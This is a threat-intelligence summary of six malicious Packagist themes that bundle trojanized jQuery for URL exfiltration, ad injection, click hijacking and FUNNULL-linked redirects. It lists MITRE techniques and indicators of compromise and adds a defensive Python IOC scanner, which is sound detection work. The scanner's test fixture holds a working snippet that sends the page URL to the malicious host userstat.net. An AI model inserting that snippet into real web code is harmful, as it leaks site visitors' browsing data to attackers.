6 Malicious Packagist Themes Ship Trojanized jQuery and FUNNULL Redirect Payloads

Socket’s Threat Research Team identified six malicious Composer packages under the ophimcms namespace on Packagist that bundle trojanized JavaScript (disguised as jQuery) to exfiltrate URLs, inject ads, hijack clicks, and redirect mobile users to gambling and adult sites. The campaign uses userstat[.]net and FUNNULL-operated infrastructure (notably union[.]macoms[.]la) as C2/redirect hosts and remains live despite OFAC sanctions.

Keypoints

  • Socket found six malicious Packagist Composer packages published under the ophimcms namespace that ship trojanized JavaScript assets masquerading as legitimate jQuery libraries.
  • Two distinct payload lines exist: FUNNULL-linked mobile redirect chains (union[.]macoms[.]la) and a geographic-agnostic URL-exfiltration chain (userstat[.]net); both are embedded in bundled JS, not PHP.
  • Three packages attributed to dev@ophim[.]cc carry FUNNULL-linked payloads; packages tied to opdlnf01@gmail[.]com deliver ad injection, click hijacking, and anti-debugging payloads, across 26 total packages in the organization.
  • The FUNNULL second-stage uses multi-layer obfuscation, environment checks (mobile-only, timezone gating, probabilistic sampling, anti-headless/admin checks) and redirects users to gambling/adult sites, while userstat[.]net exfiltrates page URLs via a script GET parameter.
  • Other malicious behaviors include full-screen overlay ads, unauthorized analytics (Baidu, 51.la), click hijacking, and anti-debugging techniques that impede analysis and block admin detection.
  • Socket submitted takedown requests; recommended actions include removing affected themes, auditing outbound requests and bundled JS for appended/injected code, and monitoring for specific domains and localStorage keys.
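The audit steps recommended above, worked into a small Python scanner. This is an added defensive example, not code from the Socket write-up or from the ophimcms project: it checks bundled JS assets for the domains, endpoint, tracking IDs and file hash listed on this page, and additionally flags code appended after a jQuery build's trailing source-map comment (a heuristic assumption of this example; the page does not describe that check). The localStorage keys mentioned above are not listed on the page, so they are not checked here.

```python
import hashlib
import re
from pathlib import Path

# Indicators from the write-up, written un-defanged so they match real file contents.
IOC_PATTERNS = {
    "funnull_redirect_host": re.compile(r"union\.macoms\.la", re.I),
    "userstat_url_exfil": re.compile(r"userstat\.net/get/script\.js\?referrer=", re.I),
    "cre_ads_click_hijack": re.compile(r"cre-ads\.com", re.I),
    "ad_injection_endpoint": re.compile(r"23\.225\.52\.67:4466"),
    "baidu_tracking_id": re.compile(
        r"71d6a48495935b1d8996cc128d9a6819|998752431dfb16634c12a163110e90ea"),
}
# SHA256 of union.macoms.la/jquery.min-3.6.8.js as listed in the IOC section.
KNOWN_BAD_SHA256 = {"fdfcbf04343f4eb89bab9eaf40fee178d9002a42c7949c9bbd24c0e8831a04b0"}
SOURCE_MAP_RE = re.compile(r"//# sourceMappingURL=\S+")


def scan_js(name: str, data: bytes) -> list[str]:
    """Return finding labels for one bundled JS asset; an empty list means nothing matched."""
    findings = []
    if hashlib.sha256(data).hexdigest() in KNOWN_BAD_SHA256:
        findings.append("known_bad_hash")
    text = data.decode("utf-8", errors="replace")
    for label, pattern in IOC_PATTERNS.items():
        if pattern.search(text):
            findings.append(label)
    # Heuristic (assumption): a genuine minified jQuery build ends at its sourceMappingURL
    # comment, so any non-whitespace content after it is a sign of appended code.
    if name.lower().startswith("jquery"):
        m = SOURCE_MAP_RE.search(text)
        if m and text[m.end():].strip():
            findings.append("code_appended_after_jquery_source_map")
    return findings


def scan_vendor(root: Path) -> dict[str, list[str]]:
    """Walk a Composer vendor tree (e.g. vendor/ophimcms) and report only files with findings."""
    report = {}
    for path in root.rglob("*.js"):
        findings = scan_js(path.name, path.read_bytes())
        if findings:
            report[str(path)] = findings
    return report


# Constructed samples for a stand-alone run; not real package contents.
CLEAN_JS = (b"/*! jQuery v3.x (constructed sample) */ !function(e,t){}(window);\n"
            b"//# sourceMappingURL=jquery.min.map\n")
TAMPERED_JS = (CLEAN_JS + b"(function(){var s=document.createElement('script');"
               b"s.src='https://userstat.net/get/script.js?referrer='+encodeURIComponent(location.href);"
               b"document.head.appendChild(s);})();\n")
```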

MITRE Techniques

  • [T1195.002] Compromise Software Supply Chain – Malicious Composer packages on Packagist impersonated OphimCMS themes to deliver trojanized JS (‘six malicious Composer packages published under the ophimcms namespace on Packagist (PHP)’)
  • [T1027] Obfuscated Files or Information – Second-stage payloads use layered obfuscation to evade detection (‘3-layer obfuscation (rotating string array, Base64 + RC4 encryption, and wrapper functions with offset indirection)’)
  • [T1059.007] JavaScript Execution – Malicious code executes in browsers via trojanized jQuery files to redirect, exfiltrate, and inject ads (‘trojanized JavaScript assets… that redirect visitors, exfiltrate URLs, inject ads’)
  • [T1204.001] User Execution: Malicious Link – Click hijacking and forced redirects rely on user interactions to trigger malicious navigation (‘When a user clicks any matching link, the intended destination opens in a new tab via window.open() while the current window is simultaneously redirected’)
  • [T1041] Exfiltration Over C2 Channel – URL exfiltration is performed by loading a remote script with the current page URL as a parameter (‘https://userstat[.]net/get/script.js?referrer=’)
  • [T1583.008] Acquire Infrastructure: Malvertising – Ad networks and FUNNULL CDN infrastructure are used to host and route malicious payloads and redirects (‘union[.]macoms[.]la is a documented FUNNULL IOC’)

Indicators of Compromise

  • [Malicious Packages] Packagist themes used to distribute payloads – ophimcms/theme-dy, ophimcms/theme-rrdyw, and 4 more malicious theme packages
  • [Domains] C2 and redirect infrastructure – union[.]macoms[.]la (FUNNULL second-stage redirect), userstat[.]net (URL exfiltration), and cre-ads[.]com (click-hijack ad network)
  • [IP:Port] Ad injection C2 – 23[.]225[.]52[.]67:4466 (hardcoded ad injection endpoint hosted by CNSERVERS LLC)
  • [Threat Actor Emails] Publisher attribution – dev@ophim[.]cc (FUNNULL-linked payloads), opdlnf01@gmail[.]com (ad injection/click hijack/anti-debug payloads)
  • [GitHub] Source repositories and accounts – https://github[.]com/ophimcms (organization hosting repositories), https://github[.]com/phantom0803 and https://github[.]com/binhnguyen1998822 (accounts linked via commit history)
  • [File Hash] Known malicious JS artifact – SHA256 FDFCBF04343F4EB89BAB9EAF40FEE178D9002A42C7949C9BBD24C0E8831A04B0 (union[.]macoms[.]la/jquery.min-3.6.8.js)
  • [Tracking IDs] Unauthorized analytics identifiers – Baidu Analytics 71d6a48495935b1d8996cc128d9a6819 (theme-dy), Baidu Analytics 998752431dfb16634c12a163110e90ea (theme-rrdyw)

Read more: https://socket.dev/blog/6-malicious-packagist-themes-ship-trojanized-jquery